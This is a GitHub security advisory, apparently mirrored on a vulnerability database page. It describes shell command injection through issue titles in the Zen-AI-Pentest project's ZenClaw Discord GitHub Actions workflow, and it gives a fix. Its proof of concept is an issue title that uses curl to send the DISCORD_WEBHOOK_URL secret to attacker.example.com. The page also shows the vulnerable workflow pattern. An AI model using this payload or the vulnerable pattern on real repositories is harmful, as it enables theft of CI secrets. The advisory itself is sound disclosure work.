GHSA-F67F-HCR6-94MF

Vulnerability from github – Published: 2026-03-20 21:47 – Updated: 2026-03-20 21:47
VLAI
Summary
Zen-AI-Pentest has Shell Injection via untrusted issue title in ZenClaw Discord Integration workflow
Details

Summary

The ZenClaw Discord Integration GitHub Actions workflow is vulnerable to shell command injection. The issue title field, controllable by any GitHub user, is interpolated directly into a run shell block via a GitHub Actions template expression. An attacker can craft an issue title containing a subshell expression that executes arbitrary commands on the runner during variable assignment, enabling exfiltration of the DISCORD_WEBHOOK_URL secret. The trigger requires no repository privileges.

Affected Component

File: .github/workflows/zenclaw-discord.yml
Commit: 07e65c72656a8213fc9ece2b3f4fc719032cfc5d
URL: https://github.com/SHAdd0WTAka/Zen-Ai-Pentest/blob/07e65c72656a8213fc9ece2b3f4fc719032cfc5d/.github/workflows/zenclaw-discord.yml
Step: Prepare Notification
Trigger: issues: [opened] — no repository privileges required


Description

In the Prepare Notification step, the issue title is assigned to a shell variable using direct GitHub Actions template interpolation inside a case block:

issues)
  ...
  DESCRIPTION="${{ github.event.issue.title }}"
  ;;

The GitHub Actions template engine resolves ${{ github.event.issue.title }} at workflow compilation time, embedding the raw issue title as literal text in the bash script before execution. The value is assigned inside a double-quoted string, which in bash evaluates subshell expressions of the form $(...) and backtick expressions `...` at runtime.

Although a subsequent sanitization step is applied:

DESCRIPTION=$(echo "$DESCRIPTION" | tr '\n' ' ' | cut -c1-1000)

This sanitization runs after the assignment — the subshell in the title has already executed by the time tr and cut process the output. The sanitization is therefore ineffective as a security control against command injection.

The resulting DESCRIPTION value is then written to $GITHUB_OUTPUT:

echo "description=$DESCRIPTION" >> $GITHUB_OUTPUT

This additional write is performed without a multiline-safe delimiter, enabling a secondary $GITHUB_OUTPUT injection if the title contains a newline, which could overwrite downstream output variables such as color or title.


Attack Vector

  1. Any GitHub user (no repository role required) opens an issue with a malicious title.
  2. The issues: opened trigger fires automatically — no human interaction or approval needed.
  3. The subshell expression in the title executes during variable assignment in the Prepare Notification step.
  4. The injected command runs with access to all secrets available to the runner.

Proof of Concept

An attacker opens an issue with the following title:

bug$(curl -s "https://attacker.example.com/exfil?wh=$(printenv DISCORD_WEBHOOK_URL | base64 -w0)")

The rendered bash assignment becomes:

DESCRIPTION="bug$(curl -s "https://attacker.example.com/exfil?wh=$(printenv DISCORD_WEBHOOK_URL | base64 -w0)")"

The subshell executes during assignment, sending the base64-encoded DISCORD_WEBHOOK_URL to the attacker's server before the sanitization step runs. The attacker can then use the stolen webhook URL to send arbitrary messages to the Discord channel impersonating the legitimate bot.


Impact

  • Confidentiality (High): Exfiltration of DISCORD_WEBHOOK_URL, granting the attacker the ability to send arbitrary messages to the Discord channel indefinitely, impersonating the ZenClaw bot.
  • Integrity (High): With the webhook URL, an attacker can post false security alerts, fake workflow failure notifications, or misleading status updates to the Discord channel, potentially causing incident response actions based on fabricated data.
  • Availability (None): No direct availability impact.

Recommended Fix

Pass all user-controlled event fields as environment variables and reference them via shell variables in the run block. Never use ${{ }} expressions inside run blocks for user-controlled data.

Vulnerable pattern:

run: |
  DESCRIPTION="${{ github.event.issue.title }}"

Safe pattern — declare in env:, reference as shell variable:

- name: Prepare Notification
  id: prep
  env:
    ISSUE_TITLE: ${{ github.event.issue.title }}
    COMMIT_MSG: ${{ github.event.head_commit.message }}
    WORKFLOW_NAME: ${{ github.event.workflow_run.name }}
    DISPATCH_MSG: ${{ github.event.inputs.message }}
    EVENT_ACTION: ${{ github.event.action }}
    WORKFLOW_CONCLUSION: ${{ github.event.workflow_run.conclusion }}
  run: |
    case "$EVENT" in
      issues)
        DESCRIPTION="$ISSUE_TITLE"
        ;;
      ...
    esac
    DESCRIPTION=$(echo "$DESCRIPTION" | tr '\n' ' ' | cut -c1-1000)

With values passed through env:, the Actions engine sets them as environment variables before the shell starts. Shell variable references ($ISSUE_TITLE) are expanded by bash at runtime without executing subshell expressions embedded in the value.


References

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "GitHub Actions",
        "name": "SHAdd0WTAka/Zen-Ai-Pentest"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "3.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-20T21:47:37Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nThe `ZenClaw Discord Integration` GitHub Actions workflow is vulnerable to shell command injection. The issue title field, controllable by any GitHub user, is interpolated directly into a `run` shell block via a GitHub Actions template expression. An attacker can craft an issue title containing a subshell expression that executes arbitrary commands on the runner during variable assignment, enabling exfiltration of the `DISCORD_WEBHOOK_URL` secret. The trigger requires no repository privileges.\n\n## Affected Component\n\n**File:** `.github/workflows/zenclaw-discord.yml`  \n**Commit:** `07e65c72656a8213fc9ece2b3f4fc719032cfc5d`  \n**URL:** `https://github.com/SHAdd0WTAka/Zen-Ai-Pentest/blob/07e65c72656a8213fc9ece2b3f4fc719032cfc5d/.github/workflows/zenclaw-discord.yml`  \n**Step:** `Prepare Notification`  \n**Trigger:** `issues: [opened]` \u2014 no repository privileges required\n\n---\n\n## Description\n\nIn the `Prepare Notification` step, the issue title is assigned to a shell variable using direct GitHub Actions template interpolation inside a `case` block:\n\n```bash\nissues)\n  ...\n  DESCRIPTION=\"${{ github.event.issue.title }}\"\n  ;;\n```\n\nThe GitHub Actions template engine resolves `${{ github.event.issue.title }}` **at workflow compilation time**, embedding the raw issue title as literal text in the bash script before execution. The value is assigned inside a double-quoted string, which in bash evaluates subshell expressions of the form `$(...)` and backtick expressions `` `...` `` at runtime.\n\nAlthough a subsequent sanitization step is applied:\n\n```bash\nDESCRIPTION=$(echo \"$DESCRIPTION\" | tr \u0027\\n\u0027 \u0027 \u0027 | cut -c1-1000)\n```\n\nThis sanitization runs **after** the assignment \u2014 the subshell in the title has already executed by the time `tr` and `cut` process the output. The sanitization is therefore ineffective as a security control against command injection.\n\nThe resulting `DESCRIPTION` value is then written to `$GITHUB_OUTPUT`:\n\n```bash\necho \"description=$DESCRIPTION\" \u003e\u003e $GITHUB_OUTPUT\n```\n\nThis additional write is performed without a multiline-safe delimiter, enabling a secondary `$GITHUB_OUTPUT` injection if the title contains a newline, which could overwrite downstream output variables such as `color` or `title`.\n\n---\n\n## Attack Vector\n\n1. Any GitHub user (no repository role required) opens an issue with a malicious title.\n2. The `issues: opened` trigger fires automatically \u2014 no human interaction or approval needed.\n3. The subshell expression in the title executes during variable assignment in the `Prepare Notification` step.\n4. The injected command runs with access to all secrets available to the runner.\n\n---\n\n## Proof of Concept\n\nAn attacker opens an issue with the following title:\n\n```\nbug$(curl -s \"https://attacker.example.com/exfil?wh=$(printenv DISCORD_WEBHOOK_URL | base64 -w0)\")\n```\n\nThe rendered bash assignment becomes:\n\n```bash\nDESCRIPTION=\"bug$(curl -s \"https://attacker.example.com/exfil?wh=$(printenv DISCORD_WEBHOOK_URL | base64 -w0)\")\"\n```\n\nThe subshell executes during assignment, sending the base64-encoded `DISCORD_WEBHOOK_URL` to the attacker\u0027s server before the sanitization step runs. The attacker can then use the stolen webhook URL to send arbitrary messages to the Discord channel impersonating the legitimate bot.\n\n---\n\n## Impact\n\n- **Confidentiality (High):** Exfiltration of `DISCORD_WEBHOOK_URL`, granting the attacker the ability to send arbitrary messages to the Discord channel indefinitely, impersonating the ZenClaw bot.\n- **Integrity (High):** With the webhook URL, an attacker can post false security alerts, fake workflow failure notifications, or misleading status updates to the Discord channel, potentially causing incident response actions based on fabricated data.\n- **Availability (None):** No direct availability impact.\n\n---\n\n## Recommended Fix\n\nPass all user-controlled event fields as environment variables and reference them via shell variables in the `run` block. Never use `${{ }}` expressions inside `run` blocks for user-controlled data.\n\n**Vulnerable pattern:**\n```yaml\nrun: |\n  DESCRIPTION=\"${{ github.event.issue.title }}\"\n```\n\n**Safe pattern \u2014 declare in `env:`, reference as shell variable:**\n```yaml\n- name: Prepare Notification\n  id: prep\n  env:\n    ISSUE_TITLE: ${{ github.event.issue.title }}\n    COMMIT_MSG: ${{ github.event.head_commit.message }}\n    WORKFLOW_NAME: ${{ github.event.workflow_run.name }}\n    DISPATCH_MSG: ${{ github.event.inputs.message }}\n    EVENT_ACTION: ${{ github.event.action }}\n    WORKFLOW_CONCLUSION: ${{ github.event.workflow_run.conclusion }}\n  run: |\n    case \"$EVENT\" in\n      issues)\n        DESCRIPTION=\"$ISSUE_TITLE\"\n        ;;\n      ...\n    esac\n    DESCRIPTION=$(echo \"$DESCRIPTION\" | tr \u0027\\n\u0027 \u0027 \u0027 | cut -c1-1000)\n```\n\nWith values passed through `env:`, the Actions engine sets them as environment variables before the shell starts. Shell variable references (`$ISSUE_TITLE`) are expanded by bash at runtime without executing subshell expressions embedded in the value.\n\n---\n\n## References\n\n- [CWE-78: Improper Neutralization of Special Elements used in an OS Command (OS Command Injection)](https://cwe.mitre.org/data/definitions/78.html)\n- [GitHub Actions Security Hardening \u2014 Understand the risk of script injections](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#understanding-the-risk-of-script-injections)\n- [Keeping your GitHub Actions and workflows secure: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)",
  "id": "GHSA-f67f-hcr6-94mf",
  "modified": "2026-03-20T21:47:37Z",
  "published": "2026-03-20T21:47:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/SHAdd0WTAka/Zen-Ai-Pentest/security/advisories/GHSA-f67f-hcr6-94mf"
    },
    {
      "type": "WEB",
      "url": "https://github.com/SHAdd0WTAka/Zen-Ai-Pentest/commit/26c4e07df780f11b7e901ad2d88b3dc5ce8a1aca"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/SHAdd0WTAka/Zen-Ai-Pentest"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Zen-AI-Pentest has Shell Injection via untrusted issue title in ZenClaw Discord Integration workflow"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…